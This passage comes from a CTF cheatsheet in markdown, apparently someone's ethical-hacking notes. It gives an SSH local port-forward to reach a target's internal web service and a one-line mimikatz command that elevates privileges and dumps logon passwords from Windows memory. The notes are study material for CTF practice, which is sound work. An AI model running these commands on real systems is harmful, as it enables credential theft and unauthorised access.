SrivathsanNayak/ethical-hacking-notes/CTFCheatsheet.md

   # after this we will be able to access service, which is running on target server port 80, on our attacker machine port 4444
   ssh joe@target.com -i id_rsa -L 4444:127.0.0.1:80
   ```

++ mimikatz:

+  + ensure you have local admin privilege for post-exploitation

+  + test with latest version of the tool in case the standard binary does not work

+  + in case of a non-interactive shell, we can run the binary in a single command without entering the mimikatz prompt - ```.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit```